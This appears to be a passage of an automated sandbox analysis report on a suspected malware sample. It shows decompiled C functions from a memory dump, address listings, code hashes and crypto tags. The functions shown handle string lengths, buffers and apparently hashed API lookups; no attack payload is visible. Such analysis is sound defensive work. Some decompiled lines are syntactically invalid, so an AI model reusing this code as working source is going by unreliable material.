											goto L67;
										}
									}
								}
							}
							L67:
							_t59 = _t203 + 1; // -6
							_t102 =  <=  ? 0x40 : _t59;
							if(_t102 > 0) {
								_t143 = (_t102 >> 5 >> 0x1a) + _t102 >> 6;
								_t103 = _t102 & 0x8000003f;
								if(_t103 < 0) {
									_t103 = (_t103 - 0x00000001 | 0xffffffc0) + 1;
								}
								_t144 = _t143 + (0 | _t103 > 0x00000000);
								_v32 = _t144 << 6;
								_push(_t144 << 7);
								_t104 = E003B1030();
								_t215 = _t215 + 4;
								_t146 =  *_t124;
								if(_t146 == 0) {
									 *_t104 = 0;
								} else {
									if(_t104 != 0) {
										_t175 =  *_t146 & 0x0000ffff;
										 *_t104 = _t175;
										if(_t175 != 0) {
											_t176 = 0;
											while(1) {
												_t176 = _t176 + 1;
												_t126 =  *(_t146 + _t176 * 4 - 2) & 0x0000ffff;
												 *(_t104 + _t176 * 4 - 2) = _t126;
												if(_t126 == 0) {
													break;
												}
												_t127 =  *(_t146 + _t176 * 4) & 0x0000ffff;
												_t104[_t176] = _t127;
												if(_t127 != 0) {
													continue;
												}
												break;
											}
											_t124 = _a4;
										}
									}
									_push(2);
									_push(_t146);
									_v36 = _t104;
									E003B10B0();
									_t104 = _v36;
									_t215 = _t215 + 8;
								}
								 *(_t124 + 4) = _v32;
								 *_t124 = _t104;
							} else {
								_t104 = 0;
							}
							if(_t104 != 0) {
								_t173 = 0;
								while(1) {
									_t147 =  *_t186 & 0x0000ffff;
									_t173 = _t173 + 1;
									 *_t104 = _t147;
									if(_t203 != 0 && _t173 == _t203) {
										break;
									}
									if(_t147 != 0) {
										_t104 =  &(_t104[0]);
										_t186 = _t186 + 2;
										continue;
									}
									goto L97;
								}
								_t104[0] = 0;
							}
						}
					}
				} else {
					_push(0x80);
					 *_t124 = 0;
					 *(_t124 + 4) = 0;
					_t204 = E003B1030();
					_t215 = _t215 + 4;
					_t179 =  *_t124;
					if(_t179 == 0) {
						 *_t204 = 0;
					} else {
						if(_t204 != 0) {
							_t152 =  *_t179 & 0x0000ffff;
							 *_t204 = _t152;
							if(_t152 != 0) {
								_t153 = 0;
								while(1) {
									_t153 = _t153 + 1;
									_t197 =  *(_t179 + _t153 * 4 - 2) & 0x0000ffff;
									 *(_t204 + _t153 * 4 - 2) = _t197;
									if(_t197 == 0) {
										goto L33;
									}
									_t198 =  *(_t179 + _t153 * 4) & 0x0000ffff;
									 *(_t204 + _t153 * 4) = _t198;
									if(_t198 != 0) {
										continue;
									}
									goto L33;
								}
							}
						}
						L33:
						_push(2);
						_push(_t179);
						E003B10B0();
						_t215 = _t215 + 8;
					}
					L96:
					 *(_t124 + 4) = 0x40;
					 *_t124 = _t204;
				}
				goto L97;
			}

0x003bf6e9
0x003bf6ec
0x003bf6fb
0x003bf701
0x003bf706
0x003bf70a
0x003bfb4d
0x003bfb4f
0x003bf710
0x003bf712
0x003bf715
0x003bf736
0x003bf73a
0x003bf746
0x003bf74b
0x003bf74b
0x003bf750
0x003bf754
0x003bf75a
0x00000000
0x00000000
0x003bf760
0x003bf765
0x00000000
0x003bf767
0x003bf76c
0x00000000
0x00000000
0x00000000
0x00000000
0x003bf76c
0x00000000
0x003bf765
0x003bfb44
0x003bfb49
0x00000000
0x003bf717
0x003bf717
0x003bf71c
0x00000000
0x003bf76e
0x003bf77a
0x003bf780
0x00000000
0x003bf782
0x003bf782
0x003bf782
0x00000000
0x003bf782
0x00000000
0x003bf780
0x00000000
0x003bf71e
0x003bf723
0x003bf725
0x003bf725
0x003bf72b
0x00000000
0x00000000
0x003bf731
0x003bf734
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x003bf734
0x003bfad3
0x003bfad5
0x003bf787
0x003bf787
0x003bf789
0x003bf78e
0x003bf790
0x003bf793
0x003bf79b
0x003bf79f
0x003bf7a1
0x003bf7a5
0x003bf7b2
0x003bf7ba
0x00000000
0x003bf7bc
0x003bf7bc
0x003bf7bf
0x003bf7bf
0x00000000
0x003bf7ba
0x003bfb2d
0x003bfb2e
0x003bfb2f
0x003bfb36
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x003bfb36
0x003bfb3c
0x003bfadb
0x003bfadb
0x003bfadb
0x00000000
0x003bfac5
0x003bfad0
0x00000000
0x003bfad0
0x003bf71c
0x003bf715
0x003bf7c3
0x003bf7c5
0x003bf7c6
0x003bf7ca
0x003bf7cc
0x003bf7d1
0x003bf7d4
0x003bf7dc
0x003bf7e0
0x003bf7e2
0x003bf7e6
0x003bf7f3
0x003bf7fb
0x00000000
0x003bf7fd
0x003bf7fd
0x003bf800
0x003bf800
0x00000000
0x003bf7fb
0x003bfb16
0x003bfb17
0x003bfb18
0x003bfb1f
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x003bfb1f
0x003bfb25
0x003bfb25
0x003bf804
0x003bf804
0x003bf809
0x003bf86e
0x003bfb0f
0x003bf874
0x003bf876
0x003bf879
0x003bf89c
0x003bf8a0
0x003bf8ac
0x003bf8b2
0x003bf8b2
0x003bf8b7
0x003bf8bb
0x003bf8c1
0x00000000
0x00000000
0x003bf8c7
0x003bf8cc
0x00000000
0x003bf8ce
0x003bf8ce
0x003bf8d7
0x00000000
0x00000000
0x00000000
0x00000000
0x003bf8d7
0x00000000
0x003bf8cc
0x003bfb00
0x003bfb03
0x003bfb05
0x003bfb08
0x003bf87b
0x003bf87b
0x003bf87f
0x00000000
0x003bf8d9
0x003bf8e1
0x003bf8e8
0x00000000
0x003bf8ea
0x003bf8ea
0x003bf8ea
0x003bf8ea
0x00000000
0x003bf8e8
0x003bf881
0x003bf886
0x003bf888
0x003bf894
0x003bf897
0x00000000
0x003bf899
0x003bf899
0x00000000
0x003bf899
0x00000000
0x003bf897
0x003bfae2
0x003bfae2
0x003bf87f
0x003bf879
0x003bf8ef
0x003bf8f3
0x003bf8f8
0x003bf8fb
0x003bf8ff
0x003bf905
0x003bf905
0x003bf907
0x003bf90c
0x003bf90e
0x003bf913
0x003bfa6a
0x003bfa6a
0x003bfa74
0x003bfa76
0x003bfa79
0x003bfa7d
0x003bfab9
0x003bfa7f
0x003bfa81
0x003bfa83
0x003bfa86
0x003bfa8b
0x003bfa8d
0x003bfa8f
0x003bfa8f
0x003bfa90
0x003bfa95
0x003bfa9c
0x00000000
0x00000000
0x003bfa9e
0x003bfaa2
0x003bfaa8
0x00000000
0x00000000
0x00000000
0x003bfaa8
0x003bfa8f
0x003bfa8b
0x003bfaaa
0x003bfaaa
0x003bfaac
0x003bfaad
0x003bfab2
0x003bfab2
0x00000000
0x003bf919
0x003bf919
0x003bf91e
0x00000000
0x003bf924
0x003bf926
0x003bf92a
0x003bf92d
0x003bf94a
0x003bf94e
0x003bf95a
0x003bf960
0x003bf960
0x003bf965
0x003bf969
0x003bf96f
0x00000000
0x00000000
0x003bf975
0x003bf97a
0x00000000
0x003bf97c
0x003bf982
0x00000000
0x00000000
0x00000000
0x00000000
0x003bf982
0x00000000
0x003bf97a
0x003bfaf2
0x003bfaf7
0x003bf92f
0x003bf92f
0x003bf934
0x00000000
0x003bf984
0x003bf98c
0x003bf993
0x00000000
0x003bf995
0x003bf995
0x003bf995
0x003bf995
0x00000000
0x003bf993
0x003bf936
0x003bf93b
0x003bf93d
0x003bf93d
0x003bf943
0x00000000
0x00000000
0x003bf945
0x003bf948
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x003bf948
0x003bf93d
0x003bf934
0x003bf92d
0x003bf99a
0x003bf99f
0x003bf9a5
0x003bf9aa
0x003bf9bd
0x003bf9c0
0x003bf9c5
0x003bf9cd
0x003bf9cd
0x003bf9d5
0x003bf9df
0x003bf9e3
0x003bf9e4
0x003bf9e9
0x003bf9ec
0x003bf9f0
0x003bfa37
0x003bf9f2
0x003bf9f4
0x003bf9f6
0x003bf9f9
0x003bf9fe
0x003bfa00
0x003bfa02
0x003bfa02
0x003bfa03
0x003bfa08
0x003bfa0f
0x00000000
0x00000000
0x003bfa11
0x003bfa15
0x003bfa1b
0x00000000
0x00000000
0x00000000
0x003bfa1b
0x003bfa1d
0x003bfa1d
0x003bf9fe
0x003bfa20
0x003bfa22
0x003bfa23
0x003bfa27
0x003bfa2c
0x003bfa30
0x003bfa30
0x003bfa3e
0x003bfa41
0x003bf9ac
0x003bf9ac
0x003bf9ac
0x003bfa45
0x003bfa47
0x003bfa51
0x003bfa51
0x003bfa54
0x003bfa55
0x003bfa5a
0x00000000
0x00000000
0x003bfa66
0x003bfa4b
0x003bfa4e
0x00000000
0x003bfa4e
0x00000000
0x003bfa66
0x003bfaec
0x003bfaec
0x003bfa45
0x003bf91e
0x003bf80b
0x003bf80d
0x003bf812
0x003bf814
0x003bf81c
0x003bf81e
0x003bf821
0x003bf825
0x003bf864
0x003bf827
0x003bf829
0x003bf82b
0x003bf82e
0x003bf833
0x003bf835
0x003bf837
0x003bf837
0x003bf838
0x003bf83d
0x003bf844
0x00000000
0x00000000
0x003bf846
0x003bf84a
0x003bf850
0x00000000
0x00000000
0x00000000
0x003bf850
0x003bf837
0x003bf833
0x003bf852
0x003bf852
0x003bf854
0x003bf855
0x003bf85a
0x003bf85a
0x003bfabc
0x003bfabc
0x003bfac3
0x003bfac3
0x00000000

Memory Dump Source

Source File: 00000004.00000002.2392646074.00000000003A0000.00000040.00000001.sdmp, Offset: 003A0000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 91b03be69b102c9b52110be9d836cbf64a67adc003a0963f1407ad5eea6b5a0b
Instruction ID: 2817e5f3590d14c72c74cb24472593b5550f984d8ab1a9ca4847c0f2b656d0d6
Opcode Fuzzy Hash: 91b03be69b102c9b52110be9d836cbf64a67adc003a0963f1407ad5eea6b5a0b
Instruction Fuzzy Hash: C9C14E71A107124EC72A8E29CC516B673E2EFD4758B2AE73DDA95CBE94FB31CC418241

Uniqueness

Uniqueness Score: -1.00%

Function 003B7FC0, Relevance: .4, Instructions: 351
COMMONCrypto

Download Yara Rule

C-Code - Quality: 79%

			E003B7FC0(intOrPtr* __ecx, signed int __edx, intOrPtr _a4) {
				signed int _v24;
				intOrPtr* _v28;
				unsigned int _v32;
				signed int _v36;
				signed int _t84;
				void* _t85;
				void* _t87;
				char* _t88;
				char _t92;
				char _t93;
				char* _t94;
				intOrPtr* _t97;
				char _t100;
				char _t102;
				char _t103;
				char _t104;
				signed int _t106;
				unsigned int _t112;
				signed int _t115;
				signed int _t116;
				char* _t117;
				char _t118;
				char _t119;
				signed int _t122;
				char* _t124;
				signed int _t127;
				signed int _t128;
				char _t132;
				signed int _t133;
				void* _t143;
				char _t144;
				signed int _t145;
				signed int _t152;
				char* _t154;
				signed int _t157;
				signed int _t159;
				signed int _t160;
				signed int _t163;
				char* _t164;
				char* _t165;
				char* _t170;
				signed int _t177;
				char* _t180;
				signed int _t187;
				signed int _t192;
				void* _t194;
				void* _t195;

				_t122 = __edx;
				_t194 = (_t192 & 0xfffffff0) - 0x14;
				_t152 = __edx;
				_t97 = __ecx;
				if(__edx == 0) {
					L70:
					_push(0x40);
					 *_t97 = 0;
					 *(_t97 + 4) = 0;
					_t170 = E003B1030();
					_t195 = _t194 + 4;
					_t124 =  *_t97;
					if(_t124 == 0) {
						 *_t170 = 0;
					} else {
						if(_t170 != 0) {
							_t102 =  *_t124;
							 *_t170 = _t102;
							if(_t102 != 0) {
								_t84 = 0;
								while(1) {
									_t84 = _t84 + 1;
									_t103 =  *((char*)(_t124 + _t84 * 2 - 1));
									 *((char*)(_t170 + _t84 * 2 - 1)) = _t103;
									if(_t103 == 0) {
										goto L76;
									}
									_t104 =  *((char*)(_t124 + _t84 * 2));
									 *((char*)(_t170 + _t84 * 2)) = _t104;
									if(_t104 != 0) {
										continue;
									}
									goto L76;
								}
							}
						}
						L76:
						_push(1);
						_push(_t124);
						E003B10B0();
						_t195 = _t195 + 8;
					}
					 *(_t97 + 4) = 0x40;
					 *_t97 = _t170;
					return _t97;
				} else {
					_t106 = __edx & 0x0000000f;
					if(_t106 == 0) {
						L6:
						asm("pxor xmm0, xmm0");
						_t177 =  ~( ~_t106 + 0x00000007 & 0x00000007) + 0x7fffffff;
						while(1) {
							asm("movdqu xmm1, [edi+ecx*2]");
							asm("pcmpeqw xmm1, xmm0");
							asm("pmovmskb edx, xmm1");
							if(_t122 != 0) {
								break;
							}
							_t106 = _t106 + 8;
							if(_t106 < _t177) {
								continue;
							} else {
								if(_t177 >= 0x7fffffff) {
									goto L12;
								} else {
									goto L10;
								}
							}
							goto L83;
						}
						asm("bsf esi, edx");
						_t177 = (_t177 >> 1) + _t106;
						goto L69;
					} else {
						_t177 = 0;
						if((_t106 & 0x00000001) != 0) {
							L10:
							while(( *(_t152 + _t177 * 2) & 0x0000ffff) != 0) {
								_t177 = _t177 + 1;
								if(_t177 < 0x7fffffff) {
									continue;
								} else {
									L12:
									_t177 = 0x7fffffff;
									goto L13;
								}
								goto L83;
							}
							goto L69;
						} else {
							_t106 =  ~_t106 + 0x10 >> 1;
							while(1) {
								_t122 =  *(_t152 + _t177 * 2) & 0x0000ffff;
								if(_t122 == 0) {
									break;
								}
								_t177 = _t177 + 1;
								if(_t177 < _t106) {
									continue;
								} else {
									goto L6;
								}
								goto L83;
							}
							L69:
							if(_t177 != 0) {
								L13:
								_t85 = E003B15C0(0xa1310f65, 0xa23ab9f2);
								if(_t85 == 0) {
									_v36 = 0;
									_t127 =  <=  ? 0x40 : _v36 + 1;
									if(_t127 > 0) {
										_t112 = (_t127 >> 5 >> 0x1a) + _t127 >> 6;
										_t128 = _t127 & 0x8000003f;
										if(_t128 < 0) {
											_t128 = (_t128 - 0x00000001 | 0xffffffc0) + 1;
										}
										_push(_t112 + (0 | _t128 > 0x00000000) << 6);
										_t115 = E003B1030();
										_t194 = _t194 + 4;
										 *_t115 = 0;
									} else {
										_t115 = 0;
									}
									_v24 = _t115;
									_t87 = E003B15C0(0xa1310f65, 0xa23ab9f2);
									_t116 = _v32;
									if(_t87 == 0) {
										 *_t97 = 0;
										 *(_t97 + 4) = 0;
										 *((char*)(_t116 + _v36)) = 0;
										if(_t116 == 0 ||  *_t116 == 0) {
											_push(0x40);
											_v24 = _t116;
											_t88 = E003B1030();
											_t117 = _v24;
											_t180 = _t88;
											_t194 = _t194 + 4;
											_t154 =  *_t97;
											if(_t154 == 0) {
												 *_t180 = 0;
											} else {
												if(_t180 != 0) {
													_t132 =  *_t154;
													 *_t180 = _t132;
													if(_t132 != 0) {
														_v28 = _t97;
														_t133 = 0;
														while(1) {
															_t133 = _t133 + 1;
															_t92 =  *((char*)(_t154 + _t133 * 2 - 1));
															 *((char*)(_t180 + _t133 * 2 - 1)) = _t92;
															if(_t92 == 0) {
																break;
															}
															_t93 =  *((char*)(_t154 + _t133 * 2));
															 *((char*)(_t180 + _t133 * 2)) = _t93;
															if(_t93 != 0) {
																continue;
															}
															break;
														}
														_t97 = _v28;
													}
												}
												_push(1);
												_push(_t154);
												_v24 = _t117;
												E003B10B0();
												_t117 = _v24;
												_t194 = _t194 + 8;
											}
											 *_t97 = _t180;
											 *(_t97 + 4) = 0x40;
										} else {
											_t157 = _t116 & 0x0000000f;
											if(_t157 == 0) {
												L29:
												asm("pxor xmm0, xmm0");
												_t187 =  ~( ~_t157 + 0x0000000f & 0x0000000f) + 0x7fffffff;
												while(1) {
													asm("movdqu xmm1, [ecx+edi]");
													asm("pcmpeqb xmm1, xmm0");
													asm("pmovmskb edx, xmm1");
													if(0 != 0) {
														break;
													}
													_t157 = _t157 + 0x10;
													if(_t157 < _t187) {
														continue;
													} else {
														if(_t187 >= 0x7fffffff) {
															L35:
															_t187 = 0x7fffffff;
														} else {
															while( *((char*)(_t187 + _t116)) != 0) {
																_t187 = _t187 + 1;
																if(_t187 < 0x7fffffff) {
																	continue;
																} else {
																	goto L35;
																}
																goto L36;
															}
														}
													}
													goto L36;
												}
												asm("bsf esi, edx");
												_t187 = _t187 + _t157;
											} else {
												_t157 =  ~_t157 + 0x10;
												_t187 = 0;
												while( *((char*)(_t187 + _t116)) != 0) {
													_t187 = _t187 + 1;
													if(_t187 < _t157) {
														continue;
													} else {
														goto L29;
													}
													goto L36;
												}
											}
											L36:
											_t20 = _t187 + 1; // 0x80000000
											_t159 =  <=  ? 0x40 : _t20;
											if(_t159 > 0) {
												_v32 = (_t159 >> 5 >> 0x1a) + _t159 >> 6;
												_t160 = _t159 & 0x8000003f;
												if(_t160 < 0) {
													_t160 = (_t160 - 0x00000001 | 0xffffffc0) + 1;
												}
												_t163 = _v32 + (0 | _t160 > 0x00000000) << 6;
												_v32 = _t163;
												_push(_t163);
												_v24 = _t116;
												_t94 = E003B1030();
												_t117 = _v24;
												_t194 = _t194 + 4;
												_t164 =  *_t97;
												if(_t164 == 0) {
													 *_t94 = 0;
												} else {
													if(_t94 != 0) {
														_t144 =  *_t164;
														 *_t94 = _t144;
														if(_t144 != 0) {
															_v36 = _t187;
															_t145 = 0;
															_v24 = _t117;
															_v28 = _t97;
															while(1) {
																_t145 = _t145 + 1;
																_t118 =  *((char*)(_t164 + _t145 * 2 - 1));
																 *((char*)(_t94 + _t145 * 2 - 1)) = _t118;
																if(_t118 == 0) {
																	break;
																}
																_t119 =  *((char*)(_t164 + _t145 * 2));
																 *((char*)(_t94 + _t145 * 2)) = _t119;
																if(_t119 != 0) {
																	continue;
																}
																break;
															}
															_t187 = _v36;
															_t117 = _v24;
															_t97 = _v28;
														}
													}
													_push(1);
													_push(_t164);
													_v36 = _t94;
													_v24 = _t117;
													E003B10B0();
													_t117 = _v24;
													_t94 = _v36;
													_t194 = _t194 + 8;
												}
												 *(_t97 + 4) = _v32;
												 *_t97 = _t94;
											} else {
												_t94 = 0;
											}
											_t165 = _t117;
											if(_t94 != 0 && _t117 != 0) {
												_v28 = _t97;
												_t143 = 0;
												while(1) {
													_t100 =  *_t165;
													_t143 = _t143 + 1;
													 *_t94 = _t100;
													if(_t187 != 0 && _t143 == _t187) {
														break;
													}
													if(_t100 == 0) {
														_t97 = _v28;
													} else {
														_t94 = _t94 + 1;
														_t165 = _t165 + 1;
														continue;
													}
													goto L68;
												}
												_t97 = _v28;
												 *((char*)(_t94 + 1)) = 0;
											}
										}
										L68:
										_push(1);
										_push(_t117);
										E003B10B0();
										return _t97;
									} else {
										_push(0);
										_push(0);
										_push(_v36);
										_push(_t116);
										_push(_t177);
										_push(_t152);
										_push(0);
										_push(_a4);
										_v24 = _t116;
										asm("int3");
										return _t87;
									}
								} else {
									_push(0);
									_push(0);
									_push(0);
									_push(0);
									_push(_t177);
									_push(_t152);
									_push(0);
									_push(_a4);
									asm("int3");
									return _t85;
								}
							} else {
								goto L70;
							}
						}
					}
				}
				L83:
			}

0x003b7fc0
0x003b7fc9
0x003b7fcc
0x003b7fce
0x003b7fd2
0x003b8317
0x003b8317
0x003b831b
0x003b831d
0x003b8325
0x003b8327
0x003b832a
0x003b832e
0x003b8365
0x003b8330
0x003b8332
0x003b8334
0x003b8337
0x003b833b
0x003b833d
0x003b833f
0x003b833f
0x003b8340
0x003b8345
0x003b834b
0x00000000
0x00000000
0x003b834d
0x003b8351
0x003b8356
0x00000000
0x00000000
0x00000000
0x003b8356
0x003b833f
0x003b833b
0x003b8358
0x003b8358
0x003b835a
0x003b835b
0x003b8360
0x003b8360
0x003b8368
0x003b8371
0x003b837c
0x003b7fd8
0x003b7fda
0x003b7fdd
0x003b7ffe
0x003b8002
0x003b800e
0x003b8014
0x003b8014
0x003b8019
0x003b801d
0x003b8023
0x00000000
0x00000000
0x003b8029
0x003b802e
0x00000000
0x003b8030
0x003b8036
0x00000000
0x00000000
0x00000000
0x00000000
0x003b8036
0x00000000
0x003b802e
0x003b839f
0x003b83a4
0x00000000
0x003b7fdf
0x003b7fdf
0x003b7fe4
0x00000000
0x003b8038
0x003b8044
0x003b804b
0x00000000
0x003b804d
0x003b804d
0x003b804d
0x00000000
0x003b804d
0x00000000
0x003b804b
0x00000000
0x003b7fe6
0x003b7feb
0x003b7fed
0x003b7fed
0x003b7ff3
0x00000000
0x00000000
0x003b7ff9
0x003b7ffc
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x003b7ffc
0x003b830f
0x003b8311
0x003b8052
0x003b805c
0x003b8063
0x003b8078
0x003b808d
0x003b8092
0x003b80a2
0x003b80a5
0x003b80ab
0x003b80b3
0x003b80b3
0x003b80c3
0x003b80c9
0x003b80cb
0x003b80ce
0x003b8094
0x003b8094
0x003b8094
0x003b80db
0x003b80df
0x003b80e4
0x003b80ea
0x003b810b
0x003b810d
0x003b8110
0x003b8115
0x003b828e
0x003b8290
0x003b8294
0x003b8299
0x003b829d
0x003b829f
0x003b82a2
0x003b82a6
0x003b82ed
0x003b82a8
0x003b82aa
0x003b82ac
0x003b82af
0x003b82b3
0x003b82b5
0x003b82b9
0x003b82bb
0x003b82bb
0x003b82bc
0x003b82c1
0x003b82c7
0x00000000
0x00000000
0x003b82c9
0x003b82cd
0x003b82d2
0x00000000
0x00000000
0x00000000
0x003b82d2
0x003b82d4
0x003b82d4
0x003b82b3
0x003b82d8
0x003b82da
0x003b82db
0x003b82df
0x003b82e4
0x003b82e8
0x003b82e8
0x003b82f0
0x003b82f2
0x003b8124
0x003b8126
0x003b8129
0x003b813d
0x003b8141
0x003b814d
0x003b8153
0x003b8153
0x003b8158
0x003b815c
0x003b8162
0x00000000
0x00000000
0x003b8168
0x003b816d
0x00000000
0x003b816f
0x003b8175
0x003b8186
0x003b8186
0x00000000
0x003b8177
0x003b817d
0x003b8184
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x003b8184
0x003b8177
0x003b8175
0x00000000
0x003b816d
0x003b8395
0x003b8398
0x003b812b
0x003b812d
0x003b8130
0x003b8132
0x003b8138
0x003b813b
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x003b813b
0x003b8132
0x003b818b
0x003b8190
0x003b8196
0x003b819b
0x003b81b1
0x003b81b5
0x003b81bb
0x003b81c3
0x003b81c3
0x003b81d1
0x003b81d4
0x003b81d8
0x003b81d9
0x003b81dd
0x003b81e2
0x003b81e6
0x003b81e9
0x003b81ed
0x003b824a
0x003b81ef
0x003b81f1
0x003b81f3
0x003b81f6
0x003b81fa
0x003b81fc
0x003b81ff
0x003b8201
0x003b8205
0x003b8209
0x003b8209
0x003b820a
0x003b820f
0x003b8215
0x00000000
0x00000000
0x003b8217
0x003b821b
0x003b8220
0x00000000
0x00000000
0x00000000
0x003b8220
0x003b8222
0x003b8225
0x003b8229
0x003b8229
0x003b81fa
0x003b822d
0x003b822f
0x003b8230
0x003b8234
0x003b8238
0x003b823d
0x003b8241
0x003b8245
0x003b8245
0x003b8251
0x003b8254
0x003b819d
0x003b819d
0x003b819d
0x003b8256
0x003b825a
0x003b8268
0x003b826c
0x003b8272
0x003b8272
0x003b8275
0x003b8276
0x003b827a
0x00000000
0x00000000
0x003b8286
0x003b838c
0x003b828c
0x003b8270
0x003b8271
0x00000000
0x003b8271
0x00000000
0x003b8286
0x003b837f
0x003b8383
0x003b8383
0x003b825a
0x003b82f9
0x003b82f9
0x003b82fb
0x003b82fc
0x003b830c
0x003b80ec
0x003b80ee
0x003b80ef
0x003b80f0
0x003b80f4
0x003b80f5
0x003b80f6
0x003b80f7
0x003b80f9
0x003b80fc
0x003b8100
0x003b8101
0x003b8101
0x003b8065
0x003b8067
0x003b8068
0x003b8069
0x003b806a
0x003b806b
0x003b806c
0x003b806d
0x003b806e
0x003b8071
0x003b8072
0x003b8072
0x00000000
0x00000000
0x00000000
0x003b8311
0x003b7fe4
0x003b7fdd
0x00000000

Memory Dump Source

Source File: 00000004.00000002.2392646074.00000000003A0000.00000040.00000001.sdmp, Offset: 003A0000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4f61ebe9e8cbaa3200c9dacce0d43bb52dd950b082ddfb78a9de9225987a4258
Instruction ID: 3fcb166b4bb2bfbd919e7acdff9b004d6ff931caaa632c6cab4bc416713878f3
Opcode Fuzzy Hash: 4f61ebe9e8cbaa3200c9dacce0d43bb52dd950b082ddfb78a9de9225987a4258
Instruction Fuzzy Hash: 85B1BD75905B5256D7278B2C88503BBBADAAFC1748F1ECA2CDE991FB85DE318C01C391

Uniqueness

Uniqueness Score: -1.00%

Function 003B83C0, Relevance: .3, Instructions: 343
COMMONCrypto

Download Yara Rule

C-Code - Quality: 83%

			E003B83C0(signed short** __ecx, signed int __edx, intOrPtr _a4) {
				signed int _v24;
				signed short** _v28;
				signed int _v32;
				signed int* _v36;
				void* _t76;
				void* _t78;
				signed short* _t79;
				signed int _t83;
				signed int _t84;
				signed int _t86;
				signed int _t87;
				signed int* _t88;
				signed short* _t93;
				signed int _t100;
				signed short* _t101;
				signed int _t108;
				signed int _t111;
				signed int _t112;
				signed int _t114;
				unsigned int _t120;
				signed int _t126;
				signed int _t127;
				signed int _t128;
				void* _t136;
				signed int _t138;
				signed int _t139;
				signed int _t142;
				signed short* _t144;
				signed int _t148;
				signed int _t149;
				signed int _t152;
				signed int _t153;
				signed short* _t154;
				signed short** _t158;
				signed int _t161;
				signed int _t162;
				signed int _t163;
				signed int _t165;
				signed int _t167;
				signed int _t168;
				signed short* _t169;
				signed int _t172;
				unsigned int _t177;
				signed int _t178;
				signed short* _t180;
				signed short* _t181;
				signed int _t188;
				void* _t190;
				void* _t191;

				_t142 = __edx;
				_t190 = (_t188 & 0xfffffff0) - 0x14;
				_t165 = __edx;
				_t158 = __ecx;
				if(__edx == 0) {
					L72:
					_push(0x80);
					 *_t158 = 0;
					_t158[1] = 0;
					_t93 = E003B1030();
					_t191 = _t190 + 4;
					_t144 =  *_t158;
					if(_t144 == 0) {
						 *_t93 = 0;
					} else {
						if(_t93 != 0) {
							_t111 =  *_t144 & 0x0000ffff;
							 *_t93 = _t111;
							if(_t111 != 0) {
								_t112 = 0;
								while(1) {
									_t112 = _t112 + 1;
									_t167 =  *(_t144 + _t112 * 4 - 2) & 0x0000ffff;
									 *(_t93 + _t112 * 4 - 2) = _t167;
									if(_t167 == 0) {
										goto L78;
									}
									_t168 =  *(_t144 + _t112 * 4) & 0x0000ffff;
									 *(_t93 + _t112 * 4) = _t168;
									if(_t168 != 0) {
										continue;
									}
									goto L78;
								}
							}
						}
						L78:
						_push(2);
						_push(_t144);
						E003B10B0();
						_t191 = _t191 + 8;
					}
					_t158[1] = 0x40;
					 *_t158 = _t93;
					return _t158;
				} else {
					_t114 = __edx & 0x0000000f;
					if(_t114 == 0) {
						L5:
						asm("pxor xmm0, xmm0");
						_t100 =  ~( ~_t114 + 0x0000000f & 0x0000000f) + 0x7fffffff;
						while(1) {
							asm("movdqu xmm1, [esi+ecx]");
							asm("pcmpeqb xmm1, xmm0");
							asm("pmovmskb edx, xmm1");
							if(_t142 != 0) {
								break;
							}
							_t114 = _t114 + 0x10;
							if(_t114 < _t100) {
								continue;
							} else {
								if(_t100 >= 0x7fffffff) {
									L11:
									_t100 = 0x7fffffff;
									goto L12;
								} else {
									while( *((char*)(_t100 + _t165)) != 0) {
										_t100 = _t100 + 1;
										if(_t100 < 0x7fffffff) {
											continue;
										} else {
											goto L11;
										}
										goto L82;
									}
									goto L71;
								}
							}
							goto L82;
						}
						asm("bsf ebx, edx");
						_t100 = _t100 + _t114;
						goto L71;
					} else {
						_t100 = 0;
						_t114 =  ~_t114 + 0x10;
						while( *((char*)(_t100 + _t165)) != 0) {
							_t100 = _t100 + 1;
							if(_t100 < _t114) {
								continue;
							} else {
								goto L5;
							}
							goto L82;
						}
						L71:
						if(_t100 != 0) {
							L12:
							_t76 = E003B15C0(0xa1310f65, 0x4a4b4242);
							if(_t76 == 0) {
								_v36 = 0;
								_t148 =  <=  ? 0x40 :  &(_v36[0]);
								if(_t148 > 0) {
									_t120 = (_t148 >> 5 >> 0x1a) + _t148 >> 6;
									_t149 = _t148 & 0x8000003f;
									if(_t149 < 0) {
										_t149 = (_t149 - 0x00000001 | 0xffffffc0) + 1;
									}
									_push(_t120 + (0 | _t149 > 0x00000000) << 7);
									_t152 = E003B1030();
									_t190 = _t190 + 4;
									 *_t152 = 0;
								} else {
									_t152 = 0;
								}
								_v24 = _t152;
								_t78 = E003B15C0(0xa1310f65, 0x4a4b4242);
								_t153 = _v32;
								if(_t78 == 0) {
									 *_t158 = 0;
									_t158[1] = 0;
									if(_t153 == 0) {
										L58:
										_push(0x80);
										_v24 = _t153;
										_t79 = E003B1030();
										_t154 = _v24;
										_t101 = _t79;
										_t190 = _t190 + 4;
										_t169 =  *_t158;
										if(_t169 == 0) {
											 *_t101 = 0;
										} else {
											if(_t101 != 0) {
												_t126 =  *_t169 & 0x0000ffff;
												 *_t101 = _t126;
												if(_t126 != 0) {
													_t127 = 0;
													while(1) {
														_t127 = _t127 + 1;
														_t83 =  *(_t169 + _t127 * 4 - 2) & 0x0000ffff;
														 *(_t101 + _t127 * 4 - 2) = _t83;
														if(_t83 == 0) {
															goto L64;
														}
														_t84 =  *(_t169 + _t127 * 4) & 0x0000ffff;
														 *(_t101 + _t127 * 4) = _t84;
														if(_t84 != 0) {
															continue;
														}
														goto L64;
													}
												}
											}
											L64:
											_push(2);
											_push(_t169);
											_v24 = _t154;
											E003B10B0();
											_t154 = _v24;
											_t190 = _t190 + 8;
										}
										 *_t158 = _t101;
										_t158[1] = 0x40;
									} else {
										_t128 =  *_t153 & 0x0000ffff;
										if(_t128 == 0) {
											goto L58;
										} else {
											_t172 = _t153 & 0x0000000f;
											if(_t172 == 0) {
												L29:
												asm("pxor xmm0, xmm0");
												_t108 =  ~( ~_t172 + 0x00000007 & 0x00000007) + 0x7fffffff;
												while(1) {
													asm("movdqu xmm1, [edx+esi*2]");
													asm("pcmpeqw xmm1, xmm0");
